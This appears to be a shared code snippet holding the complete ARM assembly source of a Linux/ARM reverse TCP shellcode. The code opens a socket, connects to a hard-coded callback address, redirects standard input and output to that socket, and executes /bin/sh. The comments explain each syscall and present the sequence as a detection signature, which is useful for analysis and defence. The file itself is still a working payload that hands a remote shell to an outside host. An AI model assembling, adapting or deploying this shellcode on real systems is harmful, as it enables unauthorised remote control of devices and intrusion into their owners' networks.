Created
April 2, 2020 14:14
Linux/ARM - Reverse TCP (192.168.1.124:4321) Shell (/bin/sh) Shellcode (64 bytes)
// This is a slightly modified version of an ARM shellcode that opens a reverse TCP shell.
// The original can be found here: https://www.exploit-db.com/exploits/46258
// and was made by Gokul Babu - https://www.linkedin.com/in/gokul-babu-452b3b112/
.section .text
.global _start
// Linux/ARM (EABI) reverse-TCP shell payload.  Behavioural sequence, useful as a
// detection signature when this is seen in a process trace:
//   socket(AF_INET, SOCK_STREAM, 0) -> connect(fd, &sockaddr, 16)
//   -> dup2(fd, 1) -> dup2(1, 0) -> execve("/bin/sh", 0, 0)
// Syscall numbers travel in r7: 281 socket, 283 connect, 63 dup2, 11 execve.
// The callback target is hard-coded in the `sockaddr` bytes at the end of the
// payload (192.168.1.124, port 4321) -- that is the indicator to extract from a
// captured sample.  Two bytes of the data are patched at run time (the strb
// instructions below), so the payload only works from writable memory.
// No syscall return value is checked: a failed socket()/connect() still falls
// through to execve.
_start:
.ARM
add r3,pc,#1                // r3 = address of the Thumb code below with bit 0 set
bx r3                       // bit 0 set => switch to Thumb state (16-bit encodings)
.THUMB
//socket:
mov r0,#2                   // domain = 2 (AF_INET)
mov r1,#1                   // type   = 1 (SOCK_STREAM)
mov r7,#200
add r7,#81                  // r7 = 281 = socket; presumably split because 281 does not fit the 8-bit imm of the 16-bit Thumb mov
svc #1                      // r0 = new socket fd (assumed to be 3; not checked)
push {r0,r1,r2} /*store all values r0=3,r1=1,r2=0*/
// NOTE(review): r2 is never written before this point; the code relies on it being 0
// on entry both as the protocol argument and as the byte stored into sockaddr below.
//connect:
adr r1, sockaddr            // r1 = &sockaddr
strb r2,[r1,#1]             // overwrite the 0xff placeholder so sin_family reads 0x0002 (AF_INET); presumably keeps the stored bytes free of NUL
mov r2,#16                  // addrlen = 16 = sizeof(struct sockaddr_in)
add r7,#2                   // r7 = 283 = connect
svc #1                      // return value ignored
//dup2:
//dup2(3,2)/*No need of stderr, program works fine without stderr*/
pop {r0,r1,r2} /* Restoring all values */  // r0 = socket fd, r1 = 1, r2 = 0
mov r7,#63                  // r7 = 63 = dup2
//dup2(3,1)
svc #1                      // stdout -> socket; r0 now holds dup2's return value (1), not the original fd
//dup2(3,0) -> but gets changed to dup2(1,0)-see strace debug file for reference
sub r1,#1                   // r1 = 0
svc #1                      // dup2(1,0): stdin -> socket (fd 1 already refers to the socket, so this still works)
//execve:
adr r0,exc                  // r0 = "/bin/shX"
strb r1,[r0,#7]             // r1 == 0 here: replaces the trailing 'X' with the NUL terminator
mov r7,#11                  // r7 = 11 = execve; argv = r1 = 0, envp = r2 = 0
svc #1
exc:
.ascii "/bin/shX"           // 'X' is patched to NUL at run time (strb above)
sockaddr:
.ascii "\x02\xff"           // sin_family: 0x02, then a 0xff placeholder that is patched to 0 at run time
.ascii "\x10\xE1" //port 4321 -- sin_port in network byte order (0x10E1)
.byte 192,168,1,124 //IP -- sin_addr 192.168.1.124, the hard-coded callback address